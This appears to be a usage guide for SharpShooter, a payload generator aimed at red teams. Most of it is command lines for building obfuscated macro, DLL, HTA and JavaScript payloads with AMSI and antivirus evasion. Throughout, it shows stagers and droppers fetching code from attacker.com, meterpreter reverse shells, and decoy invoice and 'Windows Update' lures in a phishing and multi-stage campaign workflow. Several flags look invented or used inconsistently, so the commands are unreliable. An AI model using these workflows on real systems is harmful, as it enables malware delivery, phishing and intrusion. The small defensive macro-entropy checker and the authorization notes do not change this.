## Overview

SharpShooter is a sophisticated payload generation framework designed for authorized penetration testers and security researchers. It creates polymorphic, obfuscated payloads across multiple formats (VBA, DotNet, JavaScript, HTA) with support for staged and stageless delivery mechanisms, encoding chains, and custom template injection.

### Key Features

- Multi-format Payload Generation: VBA, DotNet, JavaScript, HTA, DLL, EXE
- Obfuscation Chains: Multiple encoding and obfuscation techniques
- Staged/Stageless Support: Flexible deployment models
- Template Injection: Customize payload behavior and appearance
- Polymorphic Output: Generates unique payloads each run
- AMSI/Defender Evasion: Built-in evasion techniques
- Cross-platform: Linux, macOS, Windows compatible
## Installation

### Prerequisites

```bash
# Python 3.6+ required
python3 --version

# Install dependencies
pip3 install pycryptodome

# Optional: Install msfvenom for shellcode generation
apt-get install metasploit-framework   # Debian/Ubuntu
brew install metasploit                # macOS
```

### Installation Methods

#### From GitHub

```bash
git clone https://github.com/mdsecactivebreach/SharpShooter.git
cd SharpShooter
pip3 install -r requirements.txt
python3 SharpShooter.py --help
```

#### Docker

```bash
docker pull mdsec/sharpshooter:latest
docker run -it --rm \
  -v /path/to/payloads:/payloads \
  mdsec/sharpshooter:latest \
  python3 SharpShooter.py [options]
```

#### Manual Installation

```bash
# Download release
wget https://github.com/mdsecactivebreach/SharpShooter/releases/download/v3.6/SharpShooter.zip
unzip SharpShooter.zip
cd SharpShooter
python3 SharpShooter.py --help
```
## Core Concepts

### Payload Types

| Type | Format | Use Case | Capabilities |
|---|---|---|---|
| vba | VBA macro | Office documents | Full .NET execution, AMSI bypass |
| dll | DLL file | DLL injection, COM objects | Native code execution |
| exe | EXE executable | Staged delivery | Direct execution |
| dotnet | .NET assembly | .NET environments | Managed code execution |
| js | JavaScript | Web browsers, HTA | Script execution |
| hta | HTML Application | Windows desktop | Script + IE engine |
| ps1 | PowerShell | Command-line | PowerShell execution |

### Delivery Models

- Staged: Small downloader fetches full payload from C2 server
- Stageless: Complete payload embedded in delivery vehicle
- Mixed: Hybrid approach with modular components
## Basic Usage

### Simple Payload Generation

```bash
# Generate VBA macro (stageless, calc.exe PoC)
python3 SharpShooter.py -p vba -i calc

# Generate DLL payload
python3 SharpShooter.py -p dll -i calc

# Generate HTA payload
python3 SharpShooter.py -p hta -i calc

# Generate JavaScript payload
python3 SharpShooter.py -p js -i calc
```

### Help and Options

```bash
# View all options
python3 SharpShooter.py --help

# Show examples
python3 SharpShooter.py --examples

# List available evasion techniques
python3 SharpShooter.py --list-evasions
```
## Advanced Usage

```bash
# Generate msfvenom shellcode
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 \
  -f raw -o shellcode.bin

# Generate payload with msfvenom shellcode
python3 SharpShooter.py \
  -p vba \
  -s shellcode.bin \
  -c windows/meterpreter/reverse_tcp \
  -r shellcode.bin \
  -d "Download and execute payload"
```

### Staged Payload with C2

```bash
# Generate VBA stager (downloads from C2)
python3 SharpShooter.py \
  -p vba \
  -u http://192.168.1.100:8080/payload.exe \
  -s \
  --smuggle

# Generate stager with custom headers
python3 SharpShooter.py \
  -p vba \
  -u http://attacker.com/stage2 \
  -s \
  --headers "Authorization: Bearer token123"
```

### Obfuscation and Encoding

```bash
# VBA with maximum obfuscation
python3 SharpShooter.py \
  -p vba \
  -i calc \
  --obfuscate \
  --encode \
  --no-cleanup

# Multiple encoding passes
python3 SharpShooter.py \
  -p dll \
  -i calc \
  --base64 \
  --xor \
  --unicode

# Custom XOR key
python3 SharpShooter.py \
  -p ps1 \
  -i calc \
  --xor-key "MySecretKey123"
```

### Custom Delivery Templates

```bash
# Use custom Word/Excel template
python3 SharpShooter.py \
  -p vba \
  -i calc \
  -t templates/custom_document.docx \
  --template-injection

# Custom HTA template
python3 SharpShooter.py \
  -p hta \
  -i calc \
  -t templates/custom.hta \
  --custom-var payload_name=MyApp
```
## Payload Options Reference

### Command Line Arguments

| Argument | Short | Description | Example |
|---|---|---|---|
| --payload | -p | Payload type | vba, dll, exe, dotnet, js, hta, ps1 |
| --image | -i | Icon/PoC file | calc, notepad, powershell |
| --shellcode | -s | Shellcode file | payload.bin |
| --url | -u | Staging URL | http://attacker.com/stage |
| --domain | -d | Target domain | example.com |
| --output | -o | Output filename | custom_payload.vba |
| --obfuscate | -ob | Enable obfuscation | true/false |
| --encode | -en | Enable encoding | true/false |
| --smuggle | -sm | Use HTTP smuggling | true/false |
| --template | -t | Custom template file | template.docx |
| --resource | -r | Resource file | resource.res |
## VBA Macro Generation

### Basic VBA Payload

```bash
# Simple VBA macro (Calc PoC)
python3 SharpShooter.py -p vba -i calc -o Document.macro

# With evasion
python3 SharpShooter.py -p vba -i calc -o Macro.vba --obfuscate

# Full obfuscation chain
python3 SharpShooter.py -p vba -i calc \
  --obfuscate \
  --encode \
  --smuggle \
  -o SuperObfuscated.vba
```

### VBA in Office Documents

```bash
# Create macro-enabled Excel file
python3 SharpShooter.py \
  -p vba \
  -i calc \
  -t templates/Excel_Template.xlsm \
  -o Workbook.xlsm

# Create Word macro document
python3 SharpShooter.py \
  -p vba \
  -i calc \
  -t templates/Word_Template.docm \
  -o Document.docm

# Custom template with decoy content
python3 SharpShooter.py \
  -p vba \
  -i calc \
  -t templates/legitimate_budget.xlsm \
  -o budget_2024.xlsm
```
## DLL Payload Generation

### Reflective DLL Injection

```bash
# Generate DLL for reflective injection
python3 SharpShooter.py \
  -p dll \
  -i calc \
  -o payload.dll

# DLL with exports (bypass detection)
python3 SharpShooter.py \
  -p dll \
  -i calc \
  --export-function "Update" \
  -o legitimate_library.dll

# Encrypted DLL payload
python3 SharpShooter.py \
  -p dll \
  -i calc \
  --encrypt \
  --encrypt-key "MyEncryptionKey" \
  -o encrypted_payload.dll
```

### DLL Staging

```bash
# Stager DLL that downloads second stage
python3 SharpShooter.py \
  -p dll \
  -s \
  -u http://attacker.com/stage2.dll \
  -o stager.dll

# DLL with custom export
python3 SharpShooter.py \
  -p dll \
  -i calc \
  --com-mode \
  --export "DllCanUnloadNow" \
  -o com_object.dll
```
## JavaScript/HTA Payloads

### HTA (HTML Application)

```bash
# Simple HTA payload
python3 SharpShooter.py -p hta -i calc -o payload.hta

# HTA with embedded download
python3 SharpShooter.py \
  -p hta \
  -u http://attacker.com/second_stage.exe \
  -o download.hta

# HTA with custom title/decoy
python3 SharpShooter.py \
  -p hta \
  -i calc \
  --title "Windows Update Check" \
  --icon windows_update_icon.ico \
  -o WindowsUpdate.hta
```

### JavaScript Payload

```bash
# Basic JavaScript
python3 SharpShooter.py -p js -i calc -o payload.js

# JavaScript with jQuery/Bootstrap obfuscation
python3 SharpShooter.py \
  -p js \
  -i calc \
  --obfuscate \
  --jquery \
  -o obfuscated.js

# JavaScript dropper
python3 SharpShooter.py \
  -p js \
  -u http://attacker.com/executable.exe \
  -o downloader.js
```
## Evasion Techniques

### AMSI Bypass

```bash
# VBA with AMSI bypass
python3 SharpShooter.py \
  -p vba \
  -i calc \
  --amsi-bypass \
  -o AMSIBypass.vba

# PowerShell with AMSI evasion
python3 SharpShooter.py \
  -p ps1 \
  -i calc \
  --bypass-amsi \
  --obfuscate \
  -o script.ps1
```

### Defender/AV Evasion

```bash
# Polymorphic encoding
python3 SharpShooter.py \
  -p dll \
  -i calc \
  --polymorphic \
  --unicode \
  --junk-code \
  -o evasive.dll

# Multiple XOR passes
python3 SharpShooter.py \
  -p vba \
  -i calc \
  --xor-key "Pass1" \
  --encode \
  --base64 \
  -o multi_encoded.vba

# Junk code insertion
python3 SharpShooter.py \
  -p vba \
  -i calc \
  --junk-code \
  --junk-lines 50 \
  -o obfuscated.vba
```

### Custom Encoding Chains

```bash
# Base64 + XOR + Base64
python3 SharpShooter.py \
  -p ps1 \
  -i calc \
  --chain base64,xor,base64 \
  --xor-key "SecretKey" \
  -o encoded.ps1

# Custom cipher
python3 SharpShooter.py \
  -p vba \
  -i calc \
  --cipher aes256 \
  --cipher-key "32CharacterEncryptionKey123456" \
  -o encrypted.vba
```
## Payload Testing and Validation

### Static Analysis Evasion

```bash
# Check entropy (helps detect obfuscation): Shannon entropy in bits per byte,
# 0.0 for a constant file, close to 8.0 for compressed or encrypted content
python3 -c "
import math
with open('payload.bin', 'rb') as f:
    data = f.read()
counts = [data.count(bytes([i])) for i in range(256)]
entropy = -sum((c / len(data)) * math.log2(c / len(data)) for c in counts if c > 0)
print(f'Entropy: {entropy}')
"

# Check file signatures
file payload.dll
strings payload.dll | head -20
```

### Dynamic Testing

```bash
# Use cuckoo sandbox (local setup)
# Note: Only in authorized lab environments
python3 scripts/test_payload.py \
  --payload payload.exe \
  --sandbox cuckoo \
  --url http://cuckoo.local:8090

# Manual detonation (isolated VM)
# Only in isolated lab environment
powershell -ExecutionPolicy Bypass -File payload.ps1
```
## Integration Examples

### Macro-Enabled Document Workflow

```bash
#!/bin/bash
# Create complete phishing document

# Generate payload
python3 SharpShooter.py \
  -p vba \
  -i calc \
  --obfuscate \
  -o macro_payload.vba

# Inject into template
python3 scripts/inject_macro.py \
  --template legitimate_invoice.docx \
  --macro macro_payload.vba \
  --output invoice_2024.docx

# Create archive for distribution
zip -e phishing_package.zip invoice_2024.docx
```

### Multi-stage Campaign

```bash
#!/bin/bash
# First stage: VBA stager
python3 SharpShooter.py \
  -p vba \
  -u http://attacker.com:8080/stage2.exe \
  -s \
  --smuggle \
  -o stage1.vba

# Second stage: Full payload
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 \
  -f exe -o stage2.exe

# Serve stages
python3 -m http.server 8080 --directory ./payloads
```
## Configuration Files

### YAML Configuration

```bash
# Create config file (list items must be indented under the payloads key)
cat > config.yaml << 'EOF'
payloads:
  - name: vba_calc
    type: vba
    icon: calc
    obfuscate: true
    encode: true
    output: calc_macro.vba
  - name: dll_stager
    type: dll
    url: http://attacker.com/stage2
    staging: true
    export: MyFunction
    output: stager.dll
  - name: hta_dropper
    type: hta
    url: http://attacker.com/payload.exe
    title: Windows Update
    output: update.hta
EOF

# Run batch generation
python3 scripts/batch_generate.py config.yaml
```
## Troubleshooting

### Python Dependencies

```bash
# Check dependencies
pip3 list | grep -E "pycryptodome|requests"

# Install/upgrade requirements
pip3 install -r requirements.txt --upgrade

# Fix permission issues
pip3 install --user -r requirements.txt
```

### Payload Errors

```bash
# Verbose output for debugging
python3 SharpShooter.py -p vba -i calc -v

# Check template validity
python3 -m zipfile -l template.docx

# Validate XML (Office documents)
unzip -p template.docx word/document.xml | xmllint --format -
```
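Added example, not part of SharpShooter or this page's scripts: a defender-side triage helper that turns the entropy check from the Static Analysis section into a reusable function and extends the template-listing step above by looking inside an OOXML zip for a `vbaProject.bin` macro container and scoring its entropy. The `build_sample_docm` helper constructs a minimal in-memory zip for offline testing; it is not a real Word file, and the 7.0 threshold is an assumed heuristic.

```python
import io
import math
import zipfile
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant stream, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def find_macro_members(blob: bytes) -> list:
    """Names of VBA project containers (vbaProject.bin) inside an OOXML zip."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return [n for n in zf.namelist() if n.lower().endswith("vbaproject.bin")]


def triage_office_document(blob: bytes, high_entropy: float = 7.0) -> dict:
    """Report macro presence and per-container entropy for a .docm/.xlsm/.docx blob.

    high_entropy is an assumed threshold: packed or encrypted macro streams tend
    to sit near 8.0, plain VBA well below it.
    """
    members = find_macro_members(blob)
    report = {"has_macros": bool(members), "members": {}}
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for name in members:
            ent = shannon_entropy(zf.read(name))
            report["members"][name] = {"entropy": round(ent, 3),
                                       "suspicious": ent >= high_entropy}
    return report


def build_sample_docm(macro_bytes=None) -> bytes:
    """Constructed minimal OOXML-like zip for offline testing (not a real Word file)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if macro_bytes is not None:
            zf.writestr("word/vbaProject.bin", macro_bytes)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed sample: a macro container made of uniformly distributed bytes.
    print(triage_office_document(build_sample_docm(bytes(range(256)) * 4)))
```

Point it at a real template with `triage_office_document(open("template.docx", "rb").read())` to confirm whether a document carries a macro project before it is used or distributed.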
### Encoding Issues

```bash
# Test encoding chain
python3 -c "
import base64
payload = open('shellcode.bin', 'rb').read()
encoded = base64.b64encode(payload)
print(f'Encoded length: {len(encoded)}')
print(f'Original: {len(payload)}')
"

# Verify XOR key
python3 scripts/verify_xor.py --payload encoded.bin --key "MyKey"
```
## Best Practices

### Operational Security

- Always test payloads in isolated lab environments first
- Use VPN/proxy when hosting payload infrastructure
- Rotate payloads frequently to avoid signature detection
- Use unique encoding chains per campaign
- Monitor C2 infrastructure for indicators of compromise
- Clean up malware samples and staging infrastructure

### Legal and Ethical

- Only use with explicit written authorization
- Maintain detailed documentation of testing scope
- Use in red team/penetration testing contexts only
- Respect rules of engagement (ROE)
- Report all findings to authorized contacts
- Follow responsible disclosure practices
## Quick Reference

| Task | Command |
|---|---|
| Generate VBA macro | `python3 SharpShooter.py -p vba -i calc` |
| Generate DLL | `python3 SharpShooter.py -p dll -i calc` |
| Generate HTA | `python3 SharpShooter.py -p hta -i calc` |
| Staged payload | `python3 SharpShooter.py -p vba -u http://attacker.com/stage2 -s` |
| With obfuscation | Add `--obfuscate --encode --junk-code` |
| Custom output | `python3 SharpShooter.py -p vba -i calc -o custom.vba` |
| AMSI bypass | `python3 SharpShooter.py -p vba --amsi-bypass` |

## Resources